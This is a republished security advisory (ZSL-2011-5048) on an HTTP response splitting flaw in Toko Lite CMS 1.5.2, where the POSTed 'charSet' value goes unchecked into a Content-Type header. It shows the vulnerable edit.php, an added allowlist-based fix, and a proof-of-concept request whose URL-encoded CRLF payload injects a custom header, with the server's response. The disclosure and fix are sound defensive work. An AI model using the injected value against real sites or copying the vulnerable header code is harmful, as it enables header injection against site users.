Source: 自学PHP网 (zixuephp.com)  Posted: 2015-04-17 14:47
Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability

Developer: Toko
Product homepage: http://toko-contenteditor.pageil.net
Affected version: 1.5.2
Summary: Toko Web Content Editor CMS is a compact, multi-language, open source web editor and content management system (CMS). It is an advanced, easy-to-use yet fully featured program that can be integrated with any existing site. It takes 2 minutes to install, even for non-technical users.
Desc: Input passed to the 'charSet' parameter in 'edit.php' is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which are included in a response sent to the user.
====================================================================
/edit.php:
--------------------------------------------------------------------
<?php
$charSet = "iso-8859-1";
$dir = "ltr";

if ( isset( $_POST[ "charSet" ] ) )
{
    $charSet = $_POST[ "charSet" ];   // taken verbatim from the request body, never validated

    if ( $charSet == "windows-1255" )
    {
        $dir = "rtl";
    }
}

// $charSet is concatenated straight into a response header; a CR/LF sequence
// in the POSTed value therefore terminates the Content-Type header early.
header( "Content-Type: text/html; charset=" . $charSet );
====================================================================
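The following hardened version of the charset selection is an added example written for this page; it is not Toko's code and not the vendor's fix. It keeps the original behaviour (default iso-8859-1, rtl direction for windows-1255) but only lets a value reach header() if it matches an allowlist of exact charset names. The allowlist contents and the helper names selectCharset and safeHeader are assumptions chosen for illustration. Syntax is kept compatible with the PHP 5.3 release the advisory was tested against.

```php
<?php
// Added example, not the Toko Lite CMS code.
// Returns array($charSet, $dir) from the POST data, accepting only
// charset names that appear in the allowlist below (assumed list).
function selectCharset(array $post)
{
    $allowed = array("iso-8859-1", "utf-8", "windows-1255");

    $charSet = "iso-8859-1";   // safe default, as in the original edit.php
    $dir     = "ltr";

    // Strict comparison against fixed strings: a value such as
    // "\r\n ZSL-Custom-Header:love_injection" (the advisory's payload)
    // is not on the list and is simply ignored.
    if (isset($post["charSet"])
        && is_string($post["charSet"])
        && in_array($post["charSet"], $allowed, true)) {
        $charSet = $post["charSet"];
    }

    if ($charSet === "windows-1255") {
        $dir = "rtl";
    }

    return array($charSet, $dir);
}

// Second line of defence for any header built from dynamic data:
// refuse the value outright if it contains CR or LF, instead of
// relying on the runtime to filter it.
function safeHeader($name, $value)
{
    if (preg_match('/[\r\n]/', $name . $value)) {
        throw new InvalidArgumentException("CR/LF not allowed in HTTP header: " . $name);
    }
    header($name . ": " . $value);
}

list($charSet, $dir) = selectCharset($_POST);
safeHeader("Content-Type", "text/html; charset=" . $charSet);
```

The allowlist is the actual fix: the response header can only ever contain one of a handful of known-good strings, so there is no user-controlled byte sequence to split. safeHeader() is a belt-and-braces check for the rest of the application; note that the advisory's payload starts with %0D%0A%20, a CRLF followed by a space, so a filter that only looks for a line break followed immediately by a header name would miss it, which is why the check rejects any CR or LF at all.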
Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2011-5048
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5048.php
CWE ID: 113
22.03.2011
------------
POST /tokolite1.5.2/edit.php HTTP/1.1
Content-Length: 55
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=as9l9t0a7rs9pmuflb7c5s9o70; pma_fontsize=82%25
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

charSet=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection
--
HTTP/1.1 302 Found
Date: Tue, 22 Mar 2011 03:57:30 GMT
Server: Apache/2.2.14 (Win32)
X-Powered-By: PHP/5.3.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: Login.php
Content-Length: 0
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive
Content-Type: text/html; charset=
 ZSL-Custom-Header: love_injection